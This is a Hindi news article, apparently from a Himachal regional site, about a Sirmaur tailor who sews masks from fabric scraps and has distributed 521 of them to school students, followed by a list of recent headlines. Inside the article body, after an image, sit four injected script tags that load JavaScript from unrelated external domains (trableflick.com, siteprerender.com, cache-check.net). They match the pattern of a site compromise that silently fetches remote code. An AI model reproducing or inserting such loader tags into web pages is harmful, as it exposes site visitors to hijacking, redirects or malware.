Categories: हिमाचल

सिरमौरः संगडाह के एसके टेलर ने 3 विद्यालयों में छात्रों को वितरित किए 521 मास्क

<p>जिला सिरमौर के बस अड्डा बाजार संगड़ाह में दर्जी की छोटी सी दुकान चलाने वाले समाजसेवी एसके टेलर द्वारा शुक्रवार को क्षेत्र की तीन पाठशालाओं में 521 मास्क वितरित किए गए। उन्होंने जमा दो विद्यालय भवाही में 175 और कोरग, हरिपुरधार क्रमश: 173-173 छात्रों को फ्री मास्क वितरित किए। प्रधानमंत्री नरेन्द्र मोदी की अपील से प्रभावित होकर गत 14 मार्च 2020 से अब तक 13 हजार 500 के करीब मास्क लोगों को वितरित वितरित कर चुके हैं। मार्च 2020 से वह फ्री फेसकवर वितरण का अपना अभियान अभी तक जारी रखे हुए हैं।</p>

<p>सुरेश कुमार उर्फ एसके टेलर ने बताया कि, सिलाई के बाद बचने वाले कपड़े की कतरनों से वह अपनी मशीन फेसकवर तैयार करते हैं और फिर उन्हें सेनेटाइज करते हैं। उक्त दर्जी के अनुसार वह क्षेत्र में आम आदमी को कोरोना वैक्सीन न लगने तक मास्क वितरण का कार्यक्रम जारी रखेंगे।</p>

<p>गौरतलब है कि इससे पहले प्लास्टिक मुक्त भारत अभियान में अपनी भागीदारी सुनिश्चित करने के लिए वह लोगों को कपड़े के बैग फ्री आबंटित करते रहे हैं। सिरमौर प्रशासन द्वारा उन्हें कपड़े के बैग वितरित करने के लिए साल 2019 में गणतंत्र दिवस पर जिला मुख्यालय में सम्मानित भी किया जा चुका है। उनके समाजसेवा के जज्बे की लोग तारीफ कर रहे हैं और दो बार स्थानीय लोगों द्वारा भी मास्क वितरण के लिए उन्हें सम्मानित भी किया जा चुका है।</p>

<p><img src=”/media/gallery/images/image(2473).png” style=”height:110px; width:900px” /></p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://siteprerender.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cache-check.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1615097062163″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

सीएम सुखविंद्र सिंह सुक्खू की तबीयत फिर बिगड़ी, आईजएमसी में हुआ उपचार

Shimla: मुख्यमंत्री सुखविंद्र सिंह सुक्खू की तबीयत फिर बिगड़ी है। मंगलवार रात को उपचार करवाने…

7 hours ago

पालमपुर कृषि विवि की 112 हेक्टेयर भूमि को पर्यटन विभाग के नाम पर हस्तांतरित करने पर हाईकोर्ट की रोक

  शिमला: चौधरी सरवण कुमार एग्रीकल्चर यूनिवर्सिटी पालमपुर की 112 हेक्टेयर लैंड को पर्यटन विभाग…

7 hours ago

उपचार के लिए क्षेत्रीय अस्पताल लाया गया विचाराधीन कैदी फरार

  UNA: जिला कारागार बनगढ़ से उपचार के लिए क्षेत्रीय अस्पताल लाया गया विचाराधीन कैदी…

9 hours ago

लापता लेडीज ऑस्कर के लिए नामांकित

  Chennai, Agencies: किरण राव की ‘लापता लेडीज’ को ऑस्कर पुरस्कार 2025 के लिए भारत…

10 hours ago

हिमाचल में किसानों को 50 प्रतिशत सब्सिडी पर 1100 में मिलेंगे साइकल-हल

  Hamirpur:  प्रदेश में किसानों को 50 प्रतिशत सब्सिडी पर साइकल-हल प्रदान किए जाएंगे। 2200…

11 hours ago

संजौली कॉलेज में SFI कार्यकर्ताओं और पुलिस बल में धक्का- मुक्की

  Shimla: 6 छात्र नेताओं के निष्कासन का मामला तूल पकड़ गया है। तनाव बढ़…

11 hours ago